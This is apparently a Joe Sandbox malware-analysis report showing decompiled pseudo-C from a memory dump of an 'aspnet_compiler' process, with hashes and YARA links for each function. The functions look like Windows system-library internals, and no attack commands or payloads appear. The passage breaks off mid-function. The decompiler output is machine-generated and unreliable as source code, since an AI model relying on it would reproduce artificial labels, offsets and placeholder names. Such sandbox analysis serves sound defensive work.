                                                                                        • API String ID: 0-2679148245
                                                                                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                        • Instruction ID: 9e9e6940ffbdc51b7386c03ad667f43874d2afda5b2a209850241fd359f9e07c
                                                                                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                        • Instruction Fuzzy Hash: 0731EE32210306AFE720DE29CD85F9A7B9DABC4754F144229FA589B2C0D770ED54CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01213884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 72%
                                                                                        			E01213884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E011D9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L011B4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E011D9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                        0x01213893
                                                                                        0x01213896
                                                                                        0x01213899
                                                                                        0x0121389f
                                                                                        0x012138a0
                                                                                        0x012138a4
                                                                                        0x012138a9
                                                                                        0x012138ac
                                                                                        0x012138ad
                                                                                        0x012138ae
                                                                                        0x012138af
                                                                                        0x012138b1
                                                                                        0x012138b4
                                                                                        0x012138bb
                                                                                        0x012138bc
                                                                                        0x012138bd
                                                                                        0x012138c4
                                                                                        0x012138c8
                                                                                        0x012138ca
                                                                                        0x012138ca
                                                                                        0x012138d5
                                                                                        0x0121393e
                                                                                        0x01213940
                                                                                        0x01213942
                                                                                        0x01213952
                                                                                        0x01213954
                                                                                        0x01213961
                                                                                        0x01213961
                                                                                        0x01213967
                                                                                        0x0121396e
                                                                                        0x0121396e
                                                                                        0x01213947
                                                                                        0x0121394c
                                                                                        0x00000000
                                                                                        0x0121394c
                                                                                        0x012138ea
                                                                                        0x012138ee
                                                                                        0x012138f8
                                                                                        0x012138f9
                                                                                        0x012138ff
                                                                                        0x01213900
                                                                                        0x01213902
                                                                                        0x01213903
                                                                                        0x0121390b
                                                                                        0x0121390f
                                                                                        0x01213950
                                                                                        0x00000000
                                                                                        0x01213950
                                                                                        0x01213915
                                                                                        0x0121391d
                                                                                        0x0121391d
                                                                                        0x01213922
                                                                                        0x01213926
                                                                                        0x00000000
                                                                                        0x01213928
                                                                                        0x0121392b
                                                                                        0x0121392b
                                                                                        0x01213935
                                                                                        0x01213937
                                                                                        0x01213937
                                                                                        0x00000000
                                                                                        0x01213935
                                                                                        0x01213926
                                                                                        0x012138f0
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: BinaryName
                                                                                        • API String ID: 0-215506332
                                                                                        • Opcode ID: 1909a53c45b169084f821817431582d326677d5d0d2d93215c8756f398d48e30
                                                                                        • Instruction ID: 948eec37b515621e9de5b97c0046f043875e58b12c1cee551e92e9c0c651f8c5
                                                                                        • Opcode Fuzzy Hash: 1909a53c45b169084f821817431582d326677d5d0d2d93215c8756f398d48e30
                                                                                        • Instruction Fuzzy Hash: 23312572D1050AAFEB15DB58C945EBFBBB6FBA0B30F014169EA04A7284D7309E00C7E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011CD294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 33%
                                                                                        			E011CD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x128d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E011B4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E011DB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E011D98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E011D95D0();
					L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                        0x011cd29c
                                                                                        0x011cd2a6
                                                                                        0x011cd2b1
                                                                                        0x011cd2b5
                                                                                        0x011cd2b6
                                                                                        0x011cd2bc
                                                                                        0x011cd2bd
                                                                                        0x011cd2be
                                                                                        0x011cd2bf
                                                                                        0x011cd2c2
                                                                                        0x011cd2c4
                                                                                        0x011cd2cc
                                                                                        0x011cd384
                                                                                        0x011cd34b
                                                                                        0x011cd34f
                                                                                        0x011cd350
                                                                                        0x011cd351
                                                                                        0x011cd35c
                                                                                        0x011cd35c
                                                                                        0x011cd2d6
                                                                                        0x011cd2da
                                                                                        0x011cd2e1
                                                                                        0x011cd361
                                                                                        0x011cd369
                                                                                        0x011cd36d
                                                                                        0x011cd2e3
                                                                                        0x011cd2e3
                                                                                        0x011cd2e3
                                                                                        0x011cd2e5
                                                                                        0x011cd2ed
                                                                                        0x011cd2f5
                                                                                        0x011cd2fa
                                                                                        0x011cd302
                                                                                        0x011cd303
                                                                                        0x011cd30b
                                                                                        0x011cd30f
                                                                                        0x011cd313
                                                                                        0x011cd318
                                                                                        0x011cd31c
                                                                                        0x011cd320
                                                                                        0x011cd379
                                                                                        0x011cd37d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0120affe
                                                                                        0x0120b001
                                                                                        0x0120b011
                                                                                        0x00000000
                                                                                        0x011cd322
                                                                                        0x011cd322
                                                                                        0x011cd330
                                                                                        0x011cd337
                                                                                        0x011cd35d
                                                                                        0x011cd339
                                                                                        0x011cd33f
                                                                                        0x011cd38c
                                                                                        0x011cd38c
                                                                                        0x011cd33f
                                                                                        0x011cd349
                                                                                        0x00000000
                                                                                        0x011cd349

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: b738106fe7e5fbc9da86e7e7b72c86167995dd2c6dec21facd3793a5acc7e910
                                                                                        • Instruction ID: b7e14ee52ad959f05fc70c15fcc65bad46acb316ed7f85fbde2f6b339e9ddb3c
                                                                                        • Opcode Fuzzy Hash: b738106fe7e5fbc9da86e7e7b72c86167995dd2c6dec21facd3793a5acc7e910
                                                                                        • Instruction Fuzzy Hash: DC31BEB550C3059FCB19DF68D8809ABBBE8EBA5A54F01192EF98483251D734DD04CBD2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011A1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 72%
                                                                                        			E011A1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E011DBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E011DA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E011DA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L011B4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                        0x011a1b8f
                                                                                        0x011a1b9a
                                                                                        0x011a1b9c
                                                                                        0x011a1b9e
                                                                                        0x011a1ba3
                                                                                        0x011f7010
                                                                                        0x011f7010
                                                                                        0x00000000
                                                                                        0x011a1ba9
                                                                                        0x011a1ba9
                                                                                        0x011a1bae
                                                                                        0x00000000
                                                                                        0x011a1bc5
                                                                                        0x011a1bca
                                                                                        0x011a1bcf
                                                                                        0x011a1bd0
                                                                                        0x011a1bd1
                                                                                        0x011a1bd2
                                                                                        0x011a1bd6
                                                                                        0x011a1bdc
                                                                                        0x011a1be0
                                                                                        0x011f6ffc
                                                                                        0x011f7000
                                                                                        0x00000000
                                                                                        0x011f7006
                                                                                        0x011f7009
                                                                                        0x011f7009
                                                                                        0x011a1be6
                                                                                        0x011a1bec
                                                                                        0x011a1c0b
                                                                                        0x011a1c0b
                                                                                        0x011a1c0c
                                                                                        0x011a1c11
                                                                                        0x011a1c12
                                                                                        0x011a1c15
                                                                                        0x011a1c1b
                                                                                        0x011a1c1f
                                                                                        0x011a1c31
                                                                                        0x011a1c33
                                                                                        0x011f7026
                                                                                        0x011f7026
                                                                                        0x011a1c21
                                                                                        0x011a1c24
                                                                                        0x011a1c24
                                                                                        0x011a1bee
                                                                                        0x011a1bee
                                                                                        0x011a1bf2
                                                                                        0x011a1c3a
                                                                                        0x011a1bf4
                                                                                        0x011a1bf4
                                                                                        0x011a1c05
                                                                                        0x011a1c05
                                                                                        0x011a1c09
                                                                                        0x011a1c3e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011a1c09
                                                                                        0x011a1bec
                                                                                        0x011a1be0
                                                                                        0x011a1bae
                                                                                        0x011a1c2e

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: WindowsExcludedProcs
                                                                                        • API String ID: 0-3583428290
                                                                                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                        • Instruction ID: 2051efbd183dce87fa9a4230beda1bad0d53410ddbce8e116fe2c13c2aa77645
                                                                                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                        • Instruction Fuzzy Hash: AB21073E500229BBDB2E9A59D880F9BBFADEF51A50F464425FE048B204D730DD00C7A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011BF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011BF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                        0x011bf71d
                                                                                        0x011bf722
                                                                                        0x011bf726
                                                                                        0x01204770
                                                                                        0x011bf765
                                                                                        0x011bf769
                                                                                        0x011bf769
                                                                                        0x011bf732
                                                                                        0x0120477a
                                                                                        0x00000000
                                                                                        0x0120477a
                                                                                        0x011bf738
                                                                                        0x011bf73a
                                                                                        0x011bf73c
                                                                                        0x011bf73f
                                                                                        0x011bf746
                                                                                        0x011bf778
                                                                                        0x011bf7a9
                                                                                        0x011bf7a9
                                                                                        0x011bf754
                                                                                        0x011bf75a
                                                                                        0x011bf75d
                                                                                        0x011bf75f
                                                                                        0x011bf761
                                                                                        0x011bf76f
                                                                                        0x011bf771
                                                                                        0x011bf771
                                                                                        0x011bf76f
                                                                                        0x011bf763
                                                                                        0x00000000
                                                                                        0x011bf763
                                                                                        0x011bf77d
                                                                                        0x011bf7a3
                                                                                        0x011bf7a5
                                                                                        0x00000000
                                                                                        0x011bf7a5
                                                                                        0x011bf77f
                                                                                        0x011bf782
                                                                                        0x011bf784
                                                                                        0x011bf786
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011bf788
                                                                                        0x011bf748
                                                                                        0x011bf74d
                                                                                        0x011bf78d
                                                                                        0x011bf793
                                                                                        0x011bf7b7
                                                                                        0x011bf7bc
                                                                                        0x00000000
                                                                                        0x011bf7bc
                                                                                        0x011bf798
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011bf79d
                                                                                        0x011bf7b0
                                                                                        0x00000000
                                                                                        0x011bf7b0
                                                                                        0x011bf79f
                                                                                        0x00000000
                                                                                        0x011bf74f
                                                                                        0x011bf74f
                                                                                        0x00000000
                                                                                        0x011bf74f

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Actx
                                                                                        • API String ID: 0-89312691
                                                                                        • Opcode ID: e1524309cec16f15a6e61c53d18a96811e88d70afd57fa98571c40d45c835c8d
                                                                                        • Instruction ID: 5ba6340d39ff43e52e7da6f6f9ea5ffdce59eae1534eb3bb58608a8b7f259ea7
                                                                                        • Opcode Fuzzy Hash: e1524309cec16f15a6e61c53d18a96811e88d70afd57fa98571c40d45c835c8d
                                                                                        • Instruction Fuzzy Hash: 9F11E634304E439BE72D4E1D8CD47F67695EB85224F2645AAE961CB392D770C8038342
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01248DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 71%
                                                                                        			E01248DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1270d50);
				E011ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01225720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = E011EDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				E011EDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E011ED130(_t34, _t39, _t40);
			}





                                                                                        0x01248df1
                                                                                        0x01248df1
                                                                                        0x01248df1
                                                                                        0x01248df1
                                                                                        0x01248df1
                                                                                        0x01248df1
                                                                                        0x01248df3
                                                                                        0x01248df8
                                                                                        0x01248dfd
                                                                                        0x01248e00
                                                                                        0x01248e0e
                                                                                        0x01248e2a
                                                                                        0x01248e36
                                                                                        0x01248e38
                                                                                        0x01248e3c
                                                                                        0x01248e46
                                                                                        0x01248e46
                                                                                        0x01248e36
                                                                                        0x01248e50
                                                                                        0x01248e56
                                                                                        0x01248e59
                                                                                        0x01248e5c
                                                                                        0x01248e60
                                                                                        0x01248e67
                                                                                        0x01248e6d
                                                                                        0x01248e73
                                                                                        0x01248e74
                                                                                        0x01248eb1
                                                                                        0x01248ebd

                                                                                        Strings
                                                                                        • Critical error detected %lx, xrefs: 01248E21
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Critical error detected %lx
                                                                                        • API String ID: 0-802127002
                                                                                        • Opcode ID: bd5e73f0b9b1948118e6589c852c55979bccdf1fbfcaa1408809764c5217231d
                                                                                        • Instruction ID: cd7c3d9ae7a8f30e8598de55fc02c485540869166c3bb13b039c85d9989a0775
                                                                                        • Opcode Fuzzy Hash: bd5e73f0b9b1948118e6589c852c55979bccdf1fbfcaa1408809764c5217231d
                                                                                        • Instruction Fuzzy Hash: 3A117971E20349EBDF28DFE895097ACBBB0AB04714F20825DE528AB282C3744601CF14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01265BA5 Relevance: .6, Instructions: 592COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 88%
                                                                                        			E01265BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1271178);
				E011ED0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01264C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E011DD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01265542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x12860e8;
								if( *0x12860e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x12860e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E011D9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
